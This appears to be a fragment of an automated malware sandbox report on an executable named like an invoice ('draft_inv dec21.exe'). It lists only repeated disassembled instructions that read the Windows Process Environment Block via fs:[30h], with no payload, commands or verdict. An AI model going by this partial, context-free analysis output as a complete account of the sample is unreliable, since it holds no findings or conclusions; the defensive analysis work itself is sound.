Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h]	8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h]	8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h]	8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h]	8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h]	8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E984FFF mov eax, dword ptr fs:[00000030h]	8_2_1E984FFF
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h]	8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C6FE0 mov ecx, dword ptr fs:[00000030h]	8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C6FE0 mov ecx, dword ptr fs:[00000030h]	8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h]	8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C6FE0 mov ecx, dword ptr fs:[00000030h]	8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C6FE0 mov ecx, dword ptr fs:[00000030h]	8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h]	8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h]	8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h]	8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h]	8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h]	8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h]	8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h]	8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h]	8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h]	8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h]	8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h]	8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h]	8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8D8FFB mov eax, dword ptr fs:[00000030h]	8_2_1E8D8FFB
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8EBF0C mov eax, dword ptr fs:[00000030h]	8_2_1E8EBF0C
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8EBF0C mov eax, dword ptr fs:[00000030h]	8_2_1E8EBF0C
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8EBF0C mov eax, dword ptr fs:[00000030h]	8_2_1E8EBF0C
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E984F1D mov eax, dword ptr fs:[00000030h]	8_2_1E984F1D
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8CCF00 mov eax, dword ptr fs:[00000030h]	8_2_1E8CCF00
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8CCF00 mov eax, dword ptr fs:[00000030h]	8_2_1E8CCF00
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E92FF03 mov eax, dword ptr fs:[00000030h]	8_2_1E92FF03
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E92FF03 mov eax, dword ptr fs:[00000030h]	8_2_1E92FF03
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E92FF03 mov eax, dword ptr fs:[00000030h]	8_2_1E92FF03
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F0F16 mov eax, dword ptr fs:[00000030h]	8_2_1E8F0F16
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F0F16 mov eax, dword ptr fs:[00000030h]	8_2_1E8F0F16
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F0F16 mov eax, dword ptr fs:[00000030h]	8_2_1E8F0F16
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F0F16 mov eax, dword ptr fs:[00000030h]	8_2_1E8F0F16
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E938F3C mov eax, dword ptr fs:[00000030h]	8_2_1E938F3C
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E938F3C mov eax, dword ptr fs:[00000030h]	8_2_1E938F3C
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E938F3C mov ecx, dword ptr fs:[00000030h]	8_2_1E938F3C
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E938F3C mov ecx, dword ptr fs:[00000030h]	8_2_1E938F3C
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8CDF36 mov eax, dword ptr fs:[00000030h]	8_2_1E8CDF36
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8CDF36 mov eax, dword ptr fs:[00000030h]	8_2_1E8CDF36
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8CDF36 mov eax, dword ptr fs:[00000030h]	8_2_1E8CDF36
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8CDF36 mov eax, dword ptr fs:[00000030h]	8_2_1E8CDF36
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8AFF30 mov edi, dword ptr fs:[00000030h]	8_2_1E8AFF30
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E96AF50 mov ecx, dword ptr fs:[00000030h]	8_2_1E96AF50
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E96BF4D mov eax, dword ptr fs:[00000030h]	8_2_1E96BF4D
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E906F70 mov eax, dword ptr fs:[00000030h]	8_2_1E906F70
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E984F7C mov eax, dword ptr fs:[00000030h]	8_2_1E984F7C
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E96EF66 mov eax, dword ptr fs:[00000030h]	8_2_1E96EF66
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8AEF79 mov eax, dword ptr fs:[00000030h]	8_2_1E8AEF79
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8AEF79 mov eax, dword ptr fs:[00000030h]	8_2_1E8AEF79
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8AEF79 mov eax, dword ptr fs:[00000030h]	8_2_1E8AEF79
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8ABF70 mov eax, dword ptr fs:[00000030h]	8_2_1E8ABF70
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B1F70 mov eax, dword ptr fs:[00000030h]	8_2_1E8B1F70
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DAF72 mov eax, dword ptr fs:[00000030h]	8_2_1E8DAF72
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E96FC95 mov eax, dword ptr fs:[00000030h]	8_2_1E96FC95
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E959C98 mov ecx, dword ptr fs:[00000030h]	8_2_1E959C98
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E959C98 mov eax, dword ptr fs:[00000030h]	8_2_1E959C98
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E959C98 mov eax, dword ptr fs:[00000030h]	8_2_1E959C98
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E959C98 mov eax, dword ptr fs:[00000030h]	8_2_1E959C98
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8A7C85 mov eax, dword ptr fs:[00000030h]	8_2_1E8A7C85
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8A7C85 mov eax, dword ptr fs:[00000030h]	8_2_1E8A7C85
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8A7C85 mov eax, dword ptr fs:[00000030h]	8_2_1E8A7C85
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8A7C85 mov eax, dword ptr fs:[00000030h]	8_2_1E8A7C85
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8A7C85 mov eax, dword ptr fs:[00000030h]	8_2_1E8A7C85
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E933C80 mov ecx, dword ptr fs:[00000030h]	8_2_1E933C80
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B7C95 mov eax, dword ptr fs:[00000030h]	8_2_1E8B7C95
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B7C95 mov eax, dword ptr fs:[00000030h]	8_2_1E8B7C95
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E943CD4 mov eax, dword ptr fs:[00000030h]	8_2_1E943CD4
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E943CD4 mov eax, dword ptr fs:[00000030h]	8_2_1E943CD4
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E943CD4 mov ecx, dword ptr fs:[00000030h]	8_2_1E943CD4
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E943CD4 mov eax, dword ptr fs:[00000030h]	8_2_1E943CD4
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E943CD4 mov eax, dword ptr fs:[00000030h]	8_2_1E943CD4
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8E9CCF mov eax, dword ptr fs:[00000030h]	8_2_1E8E9CCF
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8BFCC9 mov eax, dword ptr fs:[00000030h]	8_2_1E8BFCC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E935CD0 mov eax, dword ptr fs:[00000030h]	8_2_1E935CD0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8A6CC0 mov eax, dword ptr fs:[00000030h]	8_2_1E8A6CC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8A6CC0 mov eax, dword ptr fs:[00000030h]	8_2_1E8A6CC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8A6CC0 mov eax, dword ptr fs:[00000030h]	8_2_1E8A6CC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E984CD2 mov eax, dword ptr fs:[00000030h]	8_2_1E984CD2
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8E6CC0 mov eax, dword ptr fs:[00000030h]	8_2_1E8E6CC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8D8CDF mov eax, dword ptr fs:[00000030h]	8_2_1E8D8CDF
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8D8CDF mov eax, dword ptr fs:[00000030h]	8_2_1E8D8CDF
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8CDCD1 mov eax, dword ptr fs:[00000030h]	8_2_1E8CDCD1
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8CDCD1 mov eax, dword ptr fs:[00000030h]	8_2_1E8CDCD1
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8CDCD1 mov eax, dword ptr fs:[00000030h]	8_2_1E8CDCD1
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8ECCD1 mov ecx, dword ptr fs:[00000030h]	8_2_1E8ECCD1
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8ECCD1 mov eax, dword ptr fs:[00000030h]	8_2_1E8ECCD1
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8ECCD1 mov eax, dword ptr fs:[00000030h]	8_2_1E8ECCD1
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E92CCF0 mov ecx, dword ptr fs:[00000030h]	8_2_1E92CCF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8A7CF1 mov eax, dword ptr fs:[00000030h]	8_2_1E8A7CF1
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B3CF0 mov eax, dword ptr fs:[00000030h]	8_2_1E8B3CF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B3CF0 mov eax, dword ptr fs:[00000030h]	8_2_1E8B3CF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E947CE8 mov eax, dword ptr fs:[00000030h]	8_2_1E947CE8
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E930CEE mov eax, dword ptr fs:[00000030h]	8_2_1E930CEE
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DECF3 mov eax, dword ptr fs:[00000030h]	8_2_1E8DECF3
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DECF3 mov eax, dword ptr fs:[00000030h]	8_2_1E8DECF3
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8E2C10 mov eax, dword ptr fs:[00000030h]	8_2_1E8E2C10
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8E2C10 mov eax, dword ptr fs:[00000030h]	8_2_1E8E2C10
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8E2C10 mov eax, dword ptr fs:[00000030h]	8_2_1E8E2C10
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8E2C10 mov eax, dword ptr fs:[00000030h]	8_2_1E8E2C10
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C3C20 mov eax, dword ptr fs:[00000030h]	8_2_1E8C3C20
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8CAC20 mov eax, dword ptr fs:[00000030h]	8_2_1E8CAC20
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8CAC20 mov eax, dword ptr fs:[00000030h]	8_2_1E8CAC20
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8CAC20 mov eax, dword ptr fs:[00000030h]	8_2_1E8CAC20
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E947C38 mov eax, dword ptr fs:[00000030h]	8_2_1E947C38
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E975C38 mov eax, dword ptr fs:[00000030h]	8_2_1E975C38
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E975C38 mov ecx, dword ptr fs:[00000030h]	8_2_1E975C38
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8E4C3D mov eax, dword ptr fs:[00000030h]	8_2_1E8E4C3D
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8A8C3D mov eax, dword ptr fs:[00000030h]	8_2_1E8A8C3D
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E984C59 mov eax, dword ptr fs:[00000030h]	8_2_1E984C59
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E933C57 mov eax, dword ptr fs:[00000030h]	8_2_1E933C57
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8ADC40 mov eax, dword ptr fs:[00000030h]	8_2_1E8ADC40
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C3C40 mov eax, dword ptr fs:[00000030h]	8_2_1E8C3C40
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8EBC6E mov eax, dword ptr fs:[00000030h]	8_2_1E8EBC6E
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8EBC6E mov eax, dword ptr fs:[00000030h]	8_2_1E8EBC6E
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8ACC68 mov eax, dword ptr fs:[00000030h]	8_2_1E8ACC68
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]	8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]	8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]	8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]	8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C3C60 mov ecx, dword ptr fs:[00000030h]	8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C3C60 mov ecx, dword ptr fs:[00000030h]	8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]	8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C3C60 mov ecx, dword ptr fs:[00000030h]	8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C3C60 mov ecx, dword ptr fs:[00000030h]	8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]	8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C3C60 mov ecx, dword ptr fs:[00000030h]	8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C3C60 mov ecx, dword ptr fs:[00000030h]	8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]	8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]	8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]	8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]	8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]	8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]	8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]	8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]	8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B0C79 mov eax, dword ptr fs:[00000030h]	8_2_1E8B0C79
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B0C79 mov eax, dword ptr fs:[00000030h]	8_2_1E8B0C79
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B0C79 mov eax, dword ptr fs:[00000030h]	8_2_1E8B0C79
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B8C79 mov eax, dword ptr fs:[00000030h]	8_2_1E8B8C79
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B8C79 mov eax, dword ptr fs:[00000030h]	8_2_1E8B8C79
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B8C79 mov eax, dword ptr fs:[00000030h]	8_2_1E8B8C79
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B8C79 mov eax, dword ptr fs:[00000030h]	8_2_1E8B8C79
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B8C79 mov eax, dword ptr fs:[00000030h]	8_2_1E8B8C79
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8ACD8A mov eax, dword ptr fs:[00000030h]	8_2_1E8ACD8A
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8ACD8A mov eax, dword ptr fs:[00000030h]	8_2_1E8ACD8A
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B6D91 mov eax, dword ptr fs:[00000030h]	8_2_1E8B6D91
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8A6DA6 mov eax, dword ptr fs:[00000030h]	8_2_1E8A6DA6
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8E2DBC mov eax, dword ptr fs:[00000030h]	8_2_1E8E2DBC
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8E2DBC mov ecx, dword ptr fs:[00000030h]	8_2_1E8E2DBC
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8ADDB0 mov eax, dword ptr fs:[00000030h]	8_2_1E8ADDB0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B7DB6 mov eax, dword ptr fs:[00000030h]	8_2_1E8B7DB6
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E984DA7 mov eax, dword ptr fs:[00000030h]	8_2_1E984DA7
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E96ADD6 mov eax, dword ptr fs:[00000030h]	8_2_1E96ADD6
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E96ADD6 mov eax, dword ptr fs:[00000030h]	8_2_1E96ADD6
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8A8DCD mov eax, dword ptr fs:[00000030h]	8_2_1E8A8DCD
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]	8_2_1E95FDF4
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]	8_2_1E95FDF4
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]	8_2_1E95FDF4
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]	8_2_1E95FDF4
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]	8_2_1E95FDF4
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]	8_2_1E95FDF4
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]	8_2_1E95FDF4
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]	8_2_1E95FDF4
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]	8_2_1E95FDF4
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]	8_2_1E95FDF4
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]	8_2_1E95FDF4
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]	8_2_1E95FDF4
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8BBDE0 mov eax, dword ptr fs:[00000030h]	8_2_1E8BBDE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8BBDE0 mov eax, dword ptr fs:[00000030h]	8_2_1E8BBDE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8BBDE0 mov eax, dword ptr fs:[00000030h]	8_2_1E8BBDE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8BBDE0 mov eax, dword ptr fs:[00000030h]	8_2_1E8BBDE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8BBDE0 mov eax, dword ptr fs:[00000030h]	8_2_1E8BBDE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8BBDE0 mov eax, dword ptr fs:[00000030h]	8_2_1E8BBDE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8BBDE0 mov eax, dword ptr fs:[00000030h]	8_2_1E8BBDE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8BBDE0 mov eax, dword ptr fs:[00000030h]	8_2_1E8BBDE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DFDE0 mov eax, dword ptr fs:[00000030h]	8_2_1E8DFDE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8AEDFA mov eax, dword ptr fs:[00000030h]	8_2_1E8AEDFA
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E97CDEB mov eax, dword ptr fs:[00000030h]	8_2_1E97CDEB
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E97CDEB mov eax, dword ptr fs:[00000030h]	8_2_1E97CDEB
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8BAD00 mov eax, dword ptr fs:[00000030h]	8_2_1E8BAD00
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8BAD00 mov eax, dword ptr fs:[00000030h]	8_2_1E8BAD00
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8BAD00 mov eax, dword ptr fs:[00000030h]	8_2_1E8BAD00
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8BAD00 mov eax, dword ptr fs:[00000030h]	8_2_1E8BAD00
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8BAD00 mov eax, dword ptr fs:[00000030h]	8_2_1E8BAD00
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8BAD00 mov eax, dword ptr fs:[00000030h]	8_2_1E8BAD00
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8D0D01 mov eax, dword ptr fs:[00000030h]	8_2_1E8D0D01
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DCD10 mov eax, dword ptr fs:[00000030h]	8_2_1E8DCD10
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DCD10 mov ecx, dword ptr fs:[00000030h]	8_2_1E8DCD10
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E96BD08 mov eax, dword ptr fs:[00000030h]	8_2_1E96BD08
